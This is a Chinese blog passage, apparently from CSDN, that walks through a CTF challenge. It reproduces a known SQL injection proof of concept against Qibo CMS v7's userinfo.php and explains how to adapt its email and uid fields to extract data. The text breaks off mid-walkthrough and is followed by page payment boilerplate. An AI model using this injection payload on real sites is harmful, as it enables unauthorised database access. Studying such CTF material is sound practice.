i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现

本文分享了作者在CTF比赛中解决web安全问题的过程,包括利用注入漏洞复现、绕过文件上传过滤并利用load_file获取flag,展示了高级注入技巧和渗透测试思路。

今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。

目录

再见CMS

 总结

Upload

绕过方法

 总结


再见CMS

昨天刚做一道

[WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客

今天继续按着套路来

直接在线CMS指纹识别

百度找到payload ,都是些过了很久的漏洞了

这里简单知道是一个注入漏洞就行了,我们的目的是照着payload修改找flag

POC

简单构造一下,
向http://localhost/qibov7/member/userinfo.php?job=edit&step=2
发送数据包:

truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,
address=(select user()) where uid=38%23

需要修改的emali=123@qq.com 和 uid=38

其中emali 是我们注册时用的邮箱

 uid:点击我们个人主页,uid可以看到

 下面到了自己动手的地方了(使用HACKBAR)

url

http://2ee06f
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值